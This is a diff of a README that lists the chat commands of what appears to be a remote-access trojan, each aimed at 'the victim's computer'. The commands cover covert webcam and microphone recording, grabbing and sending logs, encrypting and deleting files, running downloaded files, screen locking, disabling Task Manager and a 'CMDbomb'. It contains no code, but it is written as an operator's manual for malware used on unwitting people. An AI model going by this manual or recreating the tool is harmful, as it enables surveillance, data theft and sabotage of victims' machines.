VsileIS/rwewe/README.md

 > "!createFolder"
 >- create a folder on the victim's computer

-command = "!deleteFolder"
+> "!deleteFolder"
-using for: delete a folder on the victim's computer
+>- delete a folder on the victim's computer

-command = "!deleteFile"
+> "!deleteFile"
-using for: delete a file on the victim's computer
+>- delete a file on the victim's computer

-command = "!downloadFile"
+> downloadFile"
-using for: download the file to the victim's computer
+>- download the file to the victim's computer

-command = "!video"
+> "!video"
-using for: rec the video from the victim's webcam, duration in seconds
+>- rec the video from the victim's webcam, duration in seconds

-command = "!audio"
+> "!audio"
-using for: rec the audio from the victim's microphone, duration in seconds
+>- rec the audio from the victim's microphone, duration in seconds

-command = "!runFile"
+> "!runFile"
-using for: run the file on the victim's computer
+>- run the file on the victim's computer

-command = "!volume"
+> "!volume"
-using for: change the volume on the victim's computer
+>- change the volume on the victim's computer

-command = "!turnOff"
+> "!turnOff"
-using for: shutdown the victim's computer
+>- shutdown the victim's computer

-command = "!restart"
+> "!restart"
-using for: restart the victim's computer
+>- restart the victim's computer

-command = "!alt+f4"
+> "!alt+f4"
-using for: alt+f4 =)
+>- alt+f4 =)

-command = "!crazyCursor"
+> "!crazyCursor"
-using for: change mouse buttons
+>- change mouse buttons

-command = "!wallpaper"
+> "!wallpaper"
-using for: change the wallpaper on the victim's compute
+>- change the wallpaper on the victim's compute

-command = "!move"
+> "!move"
-using for: move the virus to the directory
+>- move the virus to the directory

-command = "!rename"
+> "!rename"
-using for: rename the virus
+>- rename the virus

-command = "!encrypt"
+> "!encrypt"
-using for: encrypt file on the victim's computer
+>- encrypt file on the victim's computer

-command = "!decrypt"
+> "!decrypt"
-using for: decrypt file on the victim's computer
+>- decrypt file on the victim's computer

-command = "!logs"
+> "!logs"
-using for: grab and send logs from the victim's computer
+>- grab and send logs from the victim's computer

-command = "!screamer"
+> "!screamer"
-using for: screamer :O
+>- screamer :O

-command = "!moveFile"
+> "!moveFile"
-using for: move the file to the directory on victim's computer
+>- move the file to the directory on victim's computer

-command = "!lock"
+> "!lock"
-using for: #winlock ('._.')
+>- #winlock ('._.')

-command = "!downloadFolder"
+> "!downloadFolder"
-using for: download folder to the victim's computer
+>- download folder to the victim's computer

-command = "!processes"
+> "!processes"
-using for: show process list
+>- show process list

-command = "!closeProces"
+> "!closeProces"
-using for: close process
+>- close process

-command = "!banTM"
+> "!banTM"
-using for: ban task manager
+>- ban task manager

-command = "!message"
+> "!message"
-using for: show text message
+>- show text message

-command = "!CMDbomb"
+> "!CMDbomb"
-using for: booom
+>- booom

 ---